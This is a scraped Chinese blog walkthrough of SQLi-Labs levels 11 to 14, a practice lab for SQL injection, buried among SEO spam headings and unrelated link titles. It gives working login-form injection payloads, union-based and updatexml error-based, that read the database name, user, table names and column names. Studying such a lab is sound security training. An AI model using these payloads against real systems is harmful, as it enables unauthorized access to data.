当前位置: 首页 > news >正文

学校网站结构图做网站哈尔滨

学校网站结构图,做网站哈尔滨,wordpress禁用版本,成都网站建设3六六SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。Less 11 SQLI DUMB SERIES-11判断注入点 尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单…
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 11

SQLI DUMB SERIES-11

welcome dhakkan

判断注入点

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号:
login attempt
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。

uname=admin' -- &passwd=1

在这里插入图片描述

实施注入

获取数前数据库的数据名和用户名

uname=0' union select database(),user() from dual -- &passwd=1

logged in
获取当前数据库的表名:

uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

successfully logged in
获取user表的列名:

uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- &passwd=1

获取用户名

Less 12

SQLI DUMB SERIES-12

通过输入判断出查询字符串的闭合方式为")
security
同样通过这一个点获取数据库名和用户名。

uname=0") union select database(),user() from dual -- &passwd=1

在这里插入图片描述

Less 13

SQLI DUMB SERIES-13

判断注入点

SQL语句错误,提示异常。

uname=0'&passwd=1

在这里插入图片描述
正常输入结果显示成功,不过没有任何提示内容。

uname=admin') -- &passwd=1

admin
如果是这样的话,那就只能通过错误信息来获取数据了,如下所示

uname=0') and updatexml(1,concat(user()),1) -- &passwd=1

localhost

实施注入

uname=0') and updatexml(1,concat('~',(database())),1) -- &passwd=1

welcome login attempt
获取当前数据库所有的表名

uname=0') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- &passwd=1

failed
获取user表所有的列名

uname=0') and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1) -- &passwd=1

123
到此注入成功

Less 14

SQLI DUMB SERIES-14

在这里插入图片描述

判断注入点

测试双引号报错。

uname=admin "&passwd=1

在这里插入图片描述
然后经测试采用双引号加注释符就可以验证登录成功。

uname=admin "-- &passwd=1

admin
但这样还不能获取数据,则判断这个注入方式为错误注入。
通过updatexml方法即可成功注入

uname=admin " and updatexml(1,user(),3)-- &passwd=1

在这里插入图片描述

实施注入

获取数据库名

uname=admin " and updatexml(1,concat('~',database()),3)-- &passwd=1

在这里插入图片描述

获取当前数据库所有的表名

uname=admin " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3)-- &passwd=1

在这里插入图片描述
获取user表所有的列名

uname=admin " and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),3)-- &passwd=1

在这里插入图片描述

系列文章

  • sqli-labs 靶场闯关基础准备
  • sqli-labs 靶场 less-1、2、3、4第一关至第四关
  • sqli-labs 靶场 less-5、6 第五关和第六关
  • sqli-labs 靶场 less-7
  • sqli-labs 靶场 less-8、9、10
http://www.yayakq.cn/news/887990/

相关文章:

  • 网站发布工具网址大全搜狐
  • 设计专业知名企业网站网站建设 报价
  • 网站建设中中文模板wordpress主题缺少样式表
  • 有哪些学做衣服的网站dw网页制作教程个人网站
  • 个人网站免费空间简单大方的网站
  • 固原门户网站建设网站建设协议需要注意的问题
  • 东莞网站建设都找菲凡网络上海外贸股票
  • php高级网站开发wordpress页面模板是哪个
  • 百度网站的设计风格苏州园区教育网
  • 做盗版网站95资料库
  • 微信商城与网站一体校园网站建设项目总结报告
  • 在腾讯云怎样建设网站重庆市特种作业证报名
  • 手机网站模板案例wordpress编辑器增加
  • 湘西网站建设公司wordpress网站微信支付
  • 关于网站的毕业设计12306网站开发成本
  • 汽车网站 源码网站怎么样被百度收录
  • 建设导航网站费用吗衡水网络推广 衡水网站建设
  • 网站子页面如何做seo网页制作基础教程简介
  • 建站工具上市免费建网站代码
  • 做景观素材有哪几个网站郑州广告牌制作市场
  • 长安网站建设推广公司智慧小区网站建设
  • 家用电脑做网站后台手机app软件开发用什么语言
  • 网站个人备案流程网站收录作用
  • 网站对比分析旅行做攻略的网站
  • 模板网站开发推荐招应届培训网页设计
  • 广州专业网站建设报价社交网站开发 转发
  • seo整站优化哪家专业如何保证网站安全
  • 杭州做购物网站做网站教程第一课
  • 做网站美工排版百度推广官网首页
  • 网站开发软件培训广西平台网站建设报价